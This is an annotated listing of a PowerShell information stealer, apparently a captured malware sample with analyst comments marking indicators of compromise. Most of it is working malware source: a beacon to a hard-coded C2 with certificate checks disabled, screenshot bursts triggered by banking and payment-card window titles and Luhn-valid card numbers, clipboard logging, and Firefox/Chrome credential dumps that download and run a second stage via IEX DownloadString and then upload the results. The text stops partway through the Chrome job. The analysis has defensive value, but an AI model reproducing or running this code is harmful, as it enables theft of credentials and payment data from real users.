# Annotated listing of a PowerShell information stealer: it fingerprints the
# host, beacons the fingerprint to a hard-coded C2, and (in the background jobs
# defined further down) captures screenshots, clipboard text and browser /
# credential-vault contents for upload. Comments mark indicators and behaviour.
#sample found by @JohnLaTwc
# Author's interval constants (seconds); the live check-in loop below sleeps 1200 s.
#$WebPostTimer = 1200
#$WebGetTimer = 1200
# Forms/Drawing are used by the screen enumeration and screenshot code below.
[void] [Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
[void] [Reflection.Assembly]::LoadWithPartialName("System.Drawing")

# Single-instance guard. Opens the named mutex if it already exists, otherwise
# creates it with initial ownership; when it already existed, blocks on
# WaitOne() until the current holder releases it. Errors from WaitOne() are
# swallowed (catch { }), so a failed wait still falls through and is reported
# as acquired. Returns a PSCustomObject { Name; Mutex } for Remove-Mutex.
# The only call site in this listing builds the name from the username and
# logon session id, so the mutex name is host-specific, not a fixed string.
function New-Mutex($MutexName) {

#[CmdletBinding()][OutputType([PSObject])]
#Param ([Parameter(Mandatory)][ValidateNotNullOrEmpty()][string]$MutexName)
    $MutexWasCreated = $false
    $Mutex = $Null
    Write-Verbose "Waiting to acquire lock [$MutexName]..."
    [void][System.Reflection.Assembly]::LoadWithPartialName('System.Threading')
    try {
        # OpenExisting throws when no mutex of that name exists yet.
        $Mutex = [System.Threading.Mutex]::OpenExisting($MutexName)
    } catch {
        # Create it; the [ref] argument receives whether a new mutex was created.
        $Mutex = New-Object System.Threading.Mutex($true, $MutexName, [ref]$MutexWasCreated)
    }
    try { if (!$MutexWasCreated) { $Mutex.WaitOne() | Out-Null } } catch { }
    Write-Verbose "Lock [$MutexName] acquired. Executing..."
    Write-Output ([PSCustomObject]@{ Name = $MutexName; Mutex = $Mutex })
} # New-Mutex
# Releases the mutex held in a New-Mutex result; ReleaseMutex errors are
# swallowed. The Param block is commented out, so $MutexObject is never bound
# as a parameter. Not called anywhere in the visible listing.
function Remove-Mutex {
<#
.SYNOPSIS
Removes a previously created Mutex
.DESCRIPTION
This function attempts to release a lock on a mutex created by an earlier call
to New-Mutex.
.PARAMETER MutexObject
The PSObject object as output by the New-Mutex function.
.INPUTS
None. You cannot pipe objects to this function.
.OUTPUTS
None.
#Requires -Version 2.0
#>
#[CmdletBinding()]
#Param ([Parameter(Mandatory)][ValidateNotNull()][PSObject]$MutexObject)
# $MutexObject | fl * | Out-String | Write-Host
    Write-Verbose "Releasing lock [$($MutexObject.Name)]..."
    try { [void]$MutexObject.Mutex.ReleaseMutex() } catch { }
} # Remove-Mutex

# Single-instance check keyed to the current user and logon session:
# mutex name "Global\<username><session id>". The returned object is not
# captured, so it is written to the pipeline/console.
new-mutex("Global\$env:username$((Get-Process -PID $pid).SessionID)")

# Returns the lowercase hex digest of the UTF-8 bytes of $String using the .NET
# hash algorithm named by $HashName (MD5 unless overridden). Used below to
# derive the "hashid" host identifier from the disk and OS serial numbers.
Function Get-StringHash([String] $String,$HashName = "MD5")
{
    $StringBuilder = New-Object System.Text.StringBuilder
    [System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{
        # two hex characters per digest byte
        [Void]$StringBuilder.Append($_.ToString("x2"))
    }
    $StringBuilder.ToString()
}

# VM / sandbox detection from WMI: BIOS serial and version first, then the
# ComputerSystem manufacturer and model. Only the boolean is returned; the
# detailed $ResultProps object is appended to $results, which nothing in this
# listing reads. $computer is never assigned in this file, so ComputerName is
# null. -ErrorAction Stop makes a failed WMI query throw out of the function,
# and the caller ($vm = IsVirtual) has no try/catch around it.
# In the visible listing the result is only reported in the beacon ("vm");
# no code branches on it.
Function IsVirtual
{
    $wmibios = Get-WmiObject Win32_BIOS -ErrorAction Stop | Select-Object version,serialnumber
    $wmisystem = Get-WmiObject Win32_ComputerSystem -ErrorAction Stop | Select-Object model,manufacturer
    $ResultProps = @{
        ComputerName = $computer
        BIOSVersion = $wmibios.Version
        SerialNumber = $wmibios.serialnumber
        Manufacturer = $wmisystem.manufacturer
        Model = $wmisystem.model
        IsVirtual = $false
        VirtualType = $null
    }
    # Check 1: VMware leaves its name in the BIOS serial number.
    if ($wmibios.SerialNumber -like "*VMware*") {
        $ResultProps.IsVirtual = $true
        $ResultProps.VirtualType = "Virtual - VMWare"
    }
    else {
        # Check 2: BIOS version string. 'VIRTUAL' and 'A M I' contain no
        # wildcard, so they are exact (case-insensitive) matches.
        switch -wildcard ($wmibios.Version) {
            'VIRTUAL' {
                $ResultProps.IsVirtual = $true
                $ResultProps.VirtualType = "Virtual - Hyper-V"
            }
            'A M I' {
                $ResultProps.IsVirtual = $true
                $ResultProps.VirtualType = "Virtual - Virtual PC"
            }
            '*Xen*' {
                $ResultProps.IsVirtual = $true
                $ResultProps.VirtualType = "Virtual - Xen"
            }
        }
    }
    # Check 3: manufacturer / model strings, only if nothing matched above.
    if (-not $ResultProps.IsVirtual) {
        if ($wmisystem.manufacturer -like "*Microsoft*")
        {
            $ResultProps.IsVirtual = $true
            $ResultProps.VirtualType = "Virtual - Hyper-V"
        }
        elseif ($wmisystem.manufacturer -like "*VMWare*")
        {
            $ResultProps.IsVirtual = $true
            $ResultProps.VirtualType = "Virtual - VMWare"
        }
        elseif ($wmisystem.model -like "*Virtual*") {
            $ResultProps.IsVirtual = $true
            $ResultProps.VirtualType = "Unknown Virtual Machine"
        }
    }
    # $results is never declared or read anywhere in this listing.
    $results += New-Object PsObject -Property $ResultProps
    return $ResultProps.IsVirtual
}

# Backslash-escapes a value for embedding in a JSON string; null becomes "".
# Replacement order: '"' is handled before '\', so the backslash inserted for
# a quote is itself doubled by the next step (an embedded quote is emitted as
# \\"). Newline, carriage return and tab are escaped last.
function Escape-JSONString($str){
    if ($str -eq $null) {return ""}
    $str = $str.ToString().Replace('"','\"').Replace('\','\\').Replace("`n",'\n').Replace("`r",'\r').Replace("`t",'\t')
    return $str;
}

# Minimal recursive JSON serializer. The help text above carries a
# '#Requires -Version 2.0' line and PowerShell 2 has no built-in ConvertTo-Json;
# on newer versions this definition shadows the cmdlet of the same name.
# Pipeline input is collected in process{}; a single item is serialized bare
# unless -forceArray. Dispatch is by the value's type name (regex match):
#   String   -> quoted, escaped via Escape-JSONString
#   DateTime -> "yyyy-MM-ddTHH:mm:ss"
#   Int32/Double -> bare number; other numeric type names fall to default
#   Boolean  -> true/false
#   Object[] -> JSON array; Hashtable -> JSON object keyed by hashtable keys
#   default  -> JSON object built from the value's *property members
# $maxDepth bounds the recursion: past it, arrays become one quoted string and
# other objects their escaped ToString().
function ConvertTo-JSON($maxDepth = 4,$forceArray = $false) {
    begin {
        $data = @()
    }
    process{
        $data += $_
    }

    end{

        if ($data.length -eq 1 -and $forceArray -eq $false) {
            $value = $data[0]
        } else {
            $value = $data
        }

        if ($value -eq $null) {
            return "null"
        }



        $dataType = $value.GetType().Name

        switch -regex ($dataType) {
            'String' {
                return "`"{0}`"" -f (Escape-JSONString $value )
            }
            '(System\.)?DateTime' {return "`"{0:yyyy-MM-dd}T{0:HH:mm:ss}`"" -f $value}
            'Int32|Double' {return "$value"}
            'Boolean' {return "$value".ToLower()}
            '(System\.)?Object\[\]' { # array

                if ($maxDepth -le 0){return "`"$value`""}

                $jsonResult = ''
                foreach($elem in $value){
                    #if ($elem -eq $null) {continue}
                    if ($jsonResult.Length -gt 0) {$jsonResult +=', '}
                    $jsonResult += ($elem | ConvertTo-JSON -maxDepth ($maxDepth -1))
                }
                return "[" + $jsonResult + "]"
            }
            '(System\.)?Hashtable' { # hashtable
                $jsonResult = ''
                foreach($key in $value.Keys){
                    if ($jsonResult.Length -gt 0) {$jsonResult +=', '}
                    $jsonResult +=
@"
"{0}": {1}
"@ -f $key , ($value[$key] | ConvertTo-JSON -maxDepth ($maxDepth -1) )
                }
                return "{" + $jsonResult + "}"
            }
            default { #object
                if ($maxDepth -le 0){return "`"{0}`"" -f (Escape-JSONString $value)}

                return "{" +
                (($value | Get-Member -MemberType *property | % {
@"
"{0}": {1}
"@ -f $_.Name , ($value.($_.Name) | ConvertTo-JSON -maxDepth ($maxDepth -1) )

                }) -join ', ') + "}"
            }
        }
    }
}

# Uptime since the WMI LastBootUpTime, formatted "<d>d:<h>h:<m>m:<s>s".
# The $computer parameter is only referenced in the commented-out Write-Host;
# the query always targets the local machine. Reported in the beacon as "uptime".
function Get-SystemUptime ($computer = "$env:computername") {
    $lastboot = [System.Management.ManagementDateTimeconverter]::ToDateTime("$((gwmi Win32_OperatingSystem).LastBootUpTime)")
    $uptime = (Get-Date) - $lastboot
    #Write-Host "System Uptime for $computer is: " $uptime.days "days" $uptime.hours "hours" $uptime.minutes "minutes" $uptime.seconds "seconds"
    return (($uptime.days).ToString()+"d:"+($uptime.hours).ToString()+"h:"+$uptime.minutes.ToString()+"m:"+($uptime.seconds).ToString()+"s")
}

# Host fingerprint collection. Everything gathered here is placed in $params
# and serialized as the JSON beacon ($m) that Invoke-Start posts.
$Screens = [system.windows.forms.screen]::AllScreens

# The loop overwrites the same variables on every pass, so $Width/$Height
# describe whichever screen AllScreens lists last; $DeviceName and $IsPrimary
# are assigned but never used.
foreach ($Screen in $Screens) {
    $DeviceName = $Screen.DeviceName
    $Width = $Screen.Bounds.Width
    $Height = $Screen.Bounds.Height
    $IsPrimary = $Screen.Primary
}
# File-system indicator: screenshot drop directory under %TEMP%, named by a fixed GUID.
$ScreenshotPath = "$env:temp\39F28DD9-0677-4EAC-91B8-2112B1515341"
if (-not (Test-Path $ScreenshotPath))
{
    New-Item $ScreenshotPath -ItemType Directory -Force
}
$resolution = $Width.ToString()+"x"+$Height.ToString()
$username = "$env:username".ToLower()
# Network indicator: C2 base URL; the hostname mimics WSUS / Windows Update naming.
$url = "https://wsusupdate.com"
# Stable per-host identifier: MD5 (Get-StringHash default) of the PHYSICALDRIVE0
# serial number concatenated with the OS serial number.
$hashid = Get-StringHash($(Get-WMIObject -class Win32_DiskDrive | Where-Object {$_.DeviceID -eq "\\.\PHYSICALDRIVE0"}).SerialNumber + `
$(Get-WmiObject -class Win32_OperatingSystem).SerialNumber )
# First CPU's name; falls back to the unindexed query when indexing yields nothing.
$cpu_name = $(Get-WmiObject -class "Win32_Processor" -namespace "root/CIMV2")[0].name
if ($cpu_name -eq $null) { $cpu_name = $(Get-WmiObject -class "Win32_Processor" -namespace "root/CIMV2").name }
# VM flag from the WMI checks in IsVirtual (an unhandled WMI error here aborts the script).
$vm = IsVirtual
# RAM rounded to whole GiB, OS caption/architecture and formatted uptime.
$ram = ([Math]::Round((Get-WmiObject -Class win32_computersystem).TotalPhysicalMemory/1Gb)).toString()
$os = (Get-WmiObject -class Win32_OperatingSystem).Caption
$os_arch = (Get-WmiObject -class Win32_OperatingSystem).OSArchitecture
$uptime = Get-SystemUptime
# External-IP lookup is disabled; the field is sent empty.
#$ext_ip = (New-Object net.webclient).downloadstring("http://checkip.dyndns.com") -replace "[^\d\.]"
$ext_ip = ''
$timezone = [TimeZoneInfo]::Local.BaseUtcOffset.Hours
# Privilege check: WindowsPrincipal role test first, with a fallback below that
# searches `whoami /groups` output for the local Administrators SID (S-1-5-32-544).
$IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
# Registry read: reports whether Remote Desktop is enabled (fDenyTSConnections).
if ((Get-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server').fDenyTSConnections -eq 1) { $rdp = $False }
else { $rdp = $True }
if($IsAdmin -ne $True){
    if( ($(whoami /groups) -like "*S-1-5-32-544*").length -eq 1 ) { $IsAdmin = $True }
}

#$wan_speed = New-Object net.webclient; "{0:N2} Mbit/sec" -f ((100/(Measure-Command {$wc.Downloadfile('http://east.testmy.net/dl-100MB',"c:\speedtest.test")}).TotalSeconds)*8); del c:\speedtest.test

# Domain-joined and not WORKGROUP -> upper-cased domain name, else 'nodomain'.
if ((gwmi win32_computersystem).partofdomain -eq $true -and (gwmi win32_computersystem).domain -ne "WORKGROUP") {
    $domain = (gwmi win32_computersystem).domain.ToUpper()
}
else {$domain = 'nodomain'}
# File-system indicator: keystroke log path. Nothing in this listing writes it;
# Title-Monitor below only reads it (presumably produced by a separate component).
$log_file = "$env:temp\key.log"
# Sample version tag sent with every upload.
$version = "04a"

# Beacon payload; the key names are the C2 protocol field names.
$params = @{"resolution" = "$resolution"; "timezone" = "$timezone"; "uptime" = "$uptime"; "computer_name" = $env:computername.ToUpper(); "isadmin" = $isadmin; "username" = "$username"; "domain" = "$domain"; "cpu_name" = "$cpu_name"; "vm" = $vm; "ram" = "$ram"; `
"hashid" = "$hashid"; "url" = "$url"; "log_file" = "$log_file"; "Screenshot_path" = "$ScreenshotPath"; "version" = "$version"; "os" = "$os"; "os_arch" = "$os_arch"; "rdp" = "$rdp"; "ext_ip" = "$ext_ip"}



# Serialized with the ConvertTo-JSON defined above and echoed to the console.
$m = $params | ConvertTo-json
$m

# Beacon: POSTs the JSON fingerprint ($m) to the C2 "/start" endpoint and
# returns the response body as a string. Any exception is converted to its
# message and returned instead, so callers cannot tell a server reply from an
# error text. TLS certificate validation is disabled process-wide on every
# call (ServerCertificateValidationCallback = { $true }), so any certificate
# is accepted, including one from an intercepting proxy. The commented-out
# line names a second host seen in this sample (dweffweew.com). Request and
# response streams are never disposed.
function Invoke-Start
{
    $buffer = [System.Text.Encoding]::UTF8.GetBytes($m)
    try {
        [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($params.url+"/start")
        #[System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create("https://dweffweew.com/start")
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
        $webRequest.ContentType = "application/json"
        $webRequest.Timeout = 10000
        $webRequest.Method = "POST"
        $webRequest.ContentLength = $buffer.Length;


        $requestStream = $webRequest.GetRequestStream()
        $requestStream.Write($buffer, 0, $buffer.Length)
        $requestStream.Flush()
        $requestStream.Close()

        [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse()
        $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream())
        $result = $streamReader.ReadToEnd()
        return $result
    }
    catch {
        return $_.Exception.Message
    }
}

# Check-in loop: beacon every 1200 s (20 min) and echo each reply. It only exits
# when the server answers the literal string 'null'; the function definitions
# after it are not reached until then. Because Invoke-Start returns exception
# messages as ordinary strings, a network error keeps the loop polling rather
# than ending it. `continue` at the end of the body is redundant.
While ($True) {
    $response = Invoke-Start
    if ($response -eq 'null') {
        break
    }
    $response
    Start-Sleep -s 1200
    continue
}



# Background job: watches the foreground window title and a keystroke log for
# payment-card / banking context and bursts screenshots when a trigger fires.
# Screenshots are only written to disk here; no upload happens in this job.
# Not invoked anywhere in the visible listing.
function Title-Monitor
{
    Start-Job -ScriptBlock {
        # P/Invoke helper so the job can obtain the foreground window handle.
        Add-Type @"
using System;
using System.Runtime.InteropServices;
public class UserWindows {
[DllImport("user32.dll")]
public static extern IntPtr GetForegroundWindow();
}
"@

        # Job arguments, in -ArgumentList order. Only $ScreenshotPath is used
        # inside this job; the others are assigned and never read here.
        $hashid = $args[0]
        $url = $args[1]
        $username = $args[2]
        $resolution = $args[3]
        $ScreenshotPath = $args[4]

        # Captures the primary screen to <ScreenshotPath>\yyyyMMdd_HHmmss.jpg at
        # JPEG quality 20. $OutPath is assigned but unused (it repeats the same
        # GUID directory that was passed in).
        function Get-ScreenShot
        {


            $OutPath = "$env:temp\39F28DD9-0677-4EAC-91B8-2112B1515341"
            Add-Type -AssemblyName System.Windows.Forms


            $fileName = '{0}.jpg' -f (Get-Date).ToString('yyyyMMdd_HHmmss')
            $path = Join-Path $ScreenshotPath $fileName
            $b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height)
            $g = [System.Drawing.Graphics]::FromImage($b)
            $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size)
            $g.Dispose()
            $myEncoder = [System.Drawing.Imaging.Encoder]::Quality
            $encoderParams = New-Object System.Drawing.Imaging.EncoderParameters(1)
            $encoderParams.Param[0] = New-Object System.Drawing.Imaging.EncoderParameter($myEncoder, 20)
            $myImageCodecInfo = [System.Drawing.Imaging.ImageCodecInfo]::GetImageEncoders()|where {$_.MimeType -eq 'image/jpeg'}
            $b.Save($path,$myImageCodecInfo, $($encoderParams))
        }

        # One capture immediately when the job starts.
        Get-ScreenShot

        # Author's earlier one-line version, superseded by the function below.
        #filter Luhn($x){$l=$x.Length-1;$l..0|%{$d=$x[$_]-48;if($_%2-eq$l%2){$s+=$d}elseif($d-le4){$s+=$d*2}else{$s+=$d*2-9}};!($s%10)}

        # Luhn check-digit validation over an array of digits: every second digit
        # from the right is doubled in place (minus 9 if above 9) and the total
        # must be divisible by 10.
        function Luhn([int[]]$digits){

            [int]$sum=0
            [bool]$alt=$false

            for($i = $digits.length - 1; $i -ge 0; $i--){
                if($alt){
                    $digits[$i] *= 2
                    if($digits[$i] -gt 9) { $digits[$i] -= 9 }
                }

                $sum += $digits[$i]
                $alt = !$alt
            }

            return ($sum % 10) -eq 0
        }


        # Poll loop, one pass every 5 s.
        $luhn_matches_previous = 0
        while ($True) {
            # Process that owns the current foreground window.
            $Process = Get-Process | ? {$_.MainWindowHandle -eq ([UserWindows]::GetForegroundWindow())}

            # Trigger 1: keystroke log. Concatenates the first comma-separated field
            # of each line of %TEMP%\key.log (quotes stripped), searches it for
            # 16-digit runs starting 4/5/6 or 15-digit runs starting 3, discards
            # runs with the same digit six or more times in a row, and Luhn-checks
            # the rest. When the count of valid runs exceeds the last seen count
            # (reset to 0 if the log shrank) it takes 20 screenshots 5 s apart.
            if (Test-Path "$env:TEMP\key.log") {
                $keystring = ''
                (Get-Content $env:temp\key.log) | foreach { $keystring += $_.split(",")[0].replace('"', '') }
                $luhn_matches = @()
                Select-String -Pattern "[456][0-9]{15}|3[0-9]{14}" -InputObject $keystring -AllMatches | foreach {$_.matches} | Select-String -NotMatch "(\d)\1{5,}" | foreach { if (luhn([int[]][string[]][char[]]$_.value) -eq $true) {$luhn_matches += $True}}
                if ($luhn_matches.length -lt $luhn_matches_previous) { $luhn_matches_previous = 0 }
                if (($luhn_matches -contains $True) -and ($luhn_matches.length -gt $luhn_matches_previous)) {

                    1..20 | % {

                        Get-ScreenShot
                        Start-Sleep -Seconds 5

                    }
                    $luhn_matches_previous = $luhn_matches.length
                }
            }




            # Trigger 2: keyword file. %TEMP%\keywords.txt (not created by this
            # listing) is read as "<token> <kw1|kw2|...>"; a case-sensitive title
            # match while key.log exists starts the same 20-shot burst.
            if (Test-Path $env:temp\keywords.txt) {
                $keywords = ((Get-Content $env:temp\keywords.txt).split(' '))[1].split('|')
                foreach ($keyword in $keywords) {if (($Process.MainWindowTitle -clike "*$keyword*" ) -and (Test-Path "$env:TEMP\key.log")) {
                    1..20 | % {
                        Get-ScreenShot
                        Start-Sleep -Seconds 5
                    }
                }
                }
            }
            # Trigger 3: built-in title list (checkout, card, banking, POS,
            # remote-access, password-manager and similar strings). Since -and
            # binds tighter than -or, the trailing Test-Path guard applies only to
            # the final '*Hosted -*' pattern; every other pattern starts the burst
            # whether or not key.log exists.
            if (($Process.MainWindowTitle -like '*checkout*') -or ($Process.MainWindowTitle -like '*Pay-Me-Now*') `
                -or ($Process.MainWindowTitle -like '*Sign On - Citibank*') -or ($Process.MainWindowTitle -like 'Sign in or Register | eBay')`
                -or ($Process.MainWindowTitle -like '*Credit Card*') -or ($Process.MainWindowTitle -like '*Place Your Order*') `
                -or ($Process.MainWindowTitle -clike '*Banking*') -or ($Process.MainWindowTitle -like '*Log in to your PayPal account*') `
                -or ($Process.MainWindowTitle -like '*Expedia Partner*Central*') -or ($Process.MainWindowTitle -like '*Booking.com Extranet*') `
                -or ($Process.MainWindowTitle -like '*Chase Online - Logon*') -or ($Process.MainWindowTitle -like '*One Time Pay*') `
                -or ($Process.MainWindowTitle -clike '*LogMeIn*') -or ($Process.MainWindowTitle -clike '*Windows Security*') `
                -or ($Process.MainWindowTitle -like '*Choose a way to pay*') -or ($Process.MainWindowTitle -like '*payment information*') `
                -or ($Process.MainWindowTitle -clike '*Change Reservation*') -or ($Process.MainWindowTitle -clike '*POS*') `
                -or ($Process.MainWindowTitle -like '*Virtual*Terminal*') -or ($Process.MainWindowTitle -like '*PayPal: Wallet*') `
                -or ($Process.MainWindowTitle -like '*iatspayment*') -or ($Process.MainWindowTitle -like '*LogMeIn*') `
                -or ($Process.MainWindowTitle -clike '*Authorize.Net*') -or ($Process.MainWindowTitle -like '*LogMeIn*') `
                -or ($Process.MainWindowTitle -clike '*Discover Card*') -or ($Process.MainWindowTitle -like '*LogMeIn*') `
                -or ($Process.MainWindowTitle -like '*ewallet*') -or ($Process.MainWindowTitle -like '*arcot*') `
                -or ($Process.MainWindowTitle -clike '*PayTrace*') -or ($Process.MainWindowTitle -clike '*New Charge*') `
                -or ($Process.MainWindowTitle -clike '*Verification*') -or ($Process.MainWindowTitle -clike '*PIN*') `
                -or ($Process.MainWindowTitle -clike '*Authentication*') -or ($Process.MainWindowTitle -clike '*Password*') `
                -or ($Process.MainWindowTitle -clike '*Debit Card*') -or ($Process.MainWindowTitle -clike '*Activation*') `
                -or ($Process.MainWindowTitle -clike '*LastPass*') -or ($Process.MainWindowTitle -clike '*SSN*') `
                -or ($Process.MainWindowTitle -clike '*Driver*License*') -or ($Process.MainWindowTitle -clike '*Check-in for*') `
                -or ($Process.MainWindowTitle -clike '*Umpqua*') -or ($Process.MainWindowTitle -clike '*ePayment*') `
                -or ($Process.MainWindowTitle -clike '*Converge -*') -or ($Process.MainWindowTitle -clike '*Swipe*') `
                -or ($Process.MainWindowTitle -like '*Payrazr*') -or ($Process.MainWindowTitle -clike '*Hosted -*') `
                -and (Test-Path "$env:TEMP\key.log")) {
                1..20 | % {

                    Get-ScreenShot
                    Start-Sleep -Seconds 5
                }
            }
            Start-Sleep -Seconds 5
        }
    } -ArgumentList $params.hashid, $params.url, $params.username, $params.resolution, $params.Screenshot_Path
}


# Background job: clipboard monitor. Every 3 s it pastes the clipboard into a
# TextBox control and, when the text is non-empty and its length and first
# character differ from the previous sample, appends it (UTF-16) to
# %TEMP%\Applnsights_VisualStudio.txt. File-system indicator: note the
# lowercase "l" in "Applnsights", a look-alike of "AppInsights".
# $TimeStamp is computed but never written (the header write is commented out).
# Not invoked anywhere in the visible listing.
function Gclip {
    Start-Job -ScriptBlock {

        $PollInterval = 3


        Add-Type -AssemblyName System.Windows.Forms

        # used to check if the contents have changed
        $PrevLength = 0
        $PrevFirstChar = ""

        for(;;){

            # stolen/adapted from http://brianreiter.org/2010/09/03/copy-and-paste-with-clipboard-from-powershell/
            $tb = New-Object System.Windows.Forms.TextBox
            $tb.Multiline = $true
            $tb.Paste()

            # only output clipboard data if it's changed
            if (($tb.Text.Length -ne 0) -and ($tb.Text.Length -ne $PrevLength)){
                # if the length isn't 0, the length has changed, and the first character
                # has changed, assume the clipboard has changed
                # YES I know there might be edge cases :)
                if($PrevFirstChar -ne ($tb.Text)[0]){
                    $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
                    #Out-File -FilePath "$env:Temp\Applnsights_VisualStudio.txt" -Append -InputObject "`========== CLIPBOARD ==========`n" -Encoding unicode
                    Out-File -FilePath "$env:Temp\Applnsights_VisualStudio.txt" -Append -InputObject $tb.Text -Encoding unicode
                    $PrevFirstChar = ($tb.Text)[0]
                    $PrevLength = $tb.Text.Length
                }
            }

            Start-Sleep -s $PollInterval
        }
    }
}


# Background job: Firefox credential dump and upload. A Start-Job runspace does
# not see the caller's functions, so the JSON helpers are redefined inside the
# job (this ConvertTo-JSON shadows the built-in cmdlet there).
# Not invoked anywhere in the visible listing.
function GetFF {
    Start-Job -ScriptBlock {
        # Copy of the top-level Escape-JSONString.
        function Escape-JSONString($str){
            if ($str -eq $null) {return ""}
            $str = $str.ToString().Replace('"','\"').Replace('\','\\').Replace("`n",'\n').Replace("`r",'\r').Replace("`t",'\t')
            return $str;
        }

        # Copy of the top-level ConvertTo-JSON serializer.
        function ConvertTo-JSON($maxDepth = 4,$forceArray = $false) {
            begin {
                $data = @()
            }
            process{
                $data += $_
            }

            end{

                if ($data.length -eq 1 -and $forceArray -eq $false) {
                    $value = $data[0]
                } else {
                    $value = $data
                }

                if ($value -eq $null) {
                    return "null"
                }



                $dataType = $value.GetType().Name

                switch -regex ($dataType) {
                    'String' {
                        return "`"{0}`"" -f (Escape-JSONString $value )
                    }
                    '(System\.)?DateTime' {return "`"{0:yyyy-MM-dd}T{0:HH:mm:ss}`"" -f $value}
                    'Int32|Double' {return "$value"}
                    'Boolean' {return "$value".ToLower()}
                    '(System\.)?Object\[\]' { # array

                        if ($maxDepth -le 0){return "`"$value`""}

                        $jsonResult = ''
                        foreach($elem in $value){
                            #if ($elem -eq $null) {continue}
                            if ($jsonResult.Length -gt 0) {$jsonResult +=', '}
                            $jsonResult += ($elem | ConvertTo-JSON -maxDepth ($maxDepth -1))
                        }
                        return "[" + $jsonResult + "]"
                    }
                    '(System\.)?Hashtable' { # hashtable
                        $jsonResult = ''
                        foreach($key in $value.Keys){
                            if ($jsonResult.Length -gt 0) {$jsonResult +=', '}
                            $jsonResult +=
@"
"{0}": {1}
"@ -f $key , ($value[$key] | ConvertTo-JSON -maxDepth ($maxDepth -1) )
                        }
                        return "{" + $jsonResult + "}"
                    }
                    default { #object
                        if ($maxDepth -le 0){return "`"{0}`"" -f (Escape-JSONString $value)}

                        return "{" +
                        (($value | Get-Member -MemberType *property | % {
@"
"{0}": {1}
"@ -f $_.Name , ($value.($_.Name) | ConvertTo-JSON -maxDepth ($maxDepth -1) )

                        }) -join ', ') + "}"
                    }
                }
            }
        }

        # Job arguments, in -ArgumentList order.
        $url = $args[0]

        $resolution = $args[1]
        $domain = $args[2]
        $computer_name = $args[3]
        $username = $args[4]
        $timezone = $args[5]
        $hashid = $args[6]
        $version = $args[7]

        # TLS certificate validation is disabled in this job's runspace as well.
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
        # Second-stage download-and-execute, attempted with both the 32-bit
        # (SysWOW64) and the 64-bit powershell.exe under cmd.exe. The child
        # disables certificate checks, IEX-runs a script fetched from the
        # hard-coded C2 (name=firefox) and calls Get-FoxDump, expected to be
        # defined by that script (not in this listing), to write %TEMP%\firefox.log.
        # $env:temp inside the double-quoted string is expanded by this parent.
        # Detection point: cmd.exe spawning powershell.exe with
        # "IEX (New-Object Net.WebClient).DownloadString(" on the command line.
        & cmd /c %systemroot%\syswow64\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('https://wsusupdate.com/script?id=random&name=firefox'); Get-FoxDump -OutFile $env:temp\firefox.log; Exit"
        & cmd /c %systemroot%\system32\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('https://wsusupdate.com/script?id=random&name=firefox'); Get-FoxDump -OutFile $env:temp\firefox.log; Exit"

        # Upload: the dump is read as text, base64-encoded, wrapped in the usual
        # JSON envelope with "type" = "ffbrwpwd", POSTed to C2 "/pshlog", and the
        # log file is then deleted. There is no try/catch, so a failed POST ends
        # the job before Remove-Item runs and the dump stays on disk.
        If (Test-Path "$env:temp\firefox.log") {
            $content = Get-Content $env:temp\firefox.log | Out-String
            $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($content))
            $json = @{"resolution" = $resolution; "domain" = $domain; "computer_name" = $computer_name; "username" = $username; "timezone" = $timezone; "hashid" = $hashid; "version" = $version; "content" = $content; "type" = "ffbrwpwd"}
            $log_json = $json | ConvertTo-Json
            $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json)
            [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($url+"/pshlog")
            $webRequest.ContentType = "application/json"
            $webRequest.Timeout = 10000
            $webRequest.Method = "POST"
            $webRequest.ContentLength = $buffer.Length;
            $requestStream = $webRequest.GetRequestStream()
            $requestStream.Write($buffer, 0, $buffer.Length)
            $requestStream.Flush()
            $requestStream.Close()

            [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse()
            $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream())
            $result = $streamReader.ReadToEnd()
            Remove-Item "$env:temp\firefox.log"
        }
    } -ArgumentList $params.url, $params.resolution, $params.domain, $params.computer_name, $params.username, $params.timezone, $params.hashid, $params.version
}

# Background job: Chrome credential dump and upload. Same structure as GetFF:
# the JSON helpers are redefined because a Start-Job runspace does not see the
# caller's functions. Differences: only the 64-bit powershell.exe is used, the
# child kills chrome.exe before dumping (presumably to free the profile
# database), the parent waits 60 s for the dump, and %TEMP%\chrome.log is
# never deleted, so the dump remains on disk as a forensic artifact.
# Not invoked anywhere in the visible listing.
function GetChrome {
    Start-Job -ScriptBlock {
        # Copy of the top-level Escape-JSONString.
        function Escape-JSONString($str){
            if ($str -eq $null) {return ""}
            $str = $str.ToString().Replace('"','\"').Replace('\','\\').Replace("`n",'\n').Replace("`r",'\r').Replace("`t",'\t')
            return $str;
        }

        # Copy of the top-level ConvertTo-JSON serializer.
        function ConvertTo-JSON($maxDepth = 4,$forceArray = $false) {
            begin {
                $data = @()
            }
            process{
                $data += $_
            }

            end{

                if ($data.length -eq 1 -and $forceArray -eq $false) {
                    $value = $data[0]
                } else {
                    $value = $data
                }

                if ($value -eq $null) {
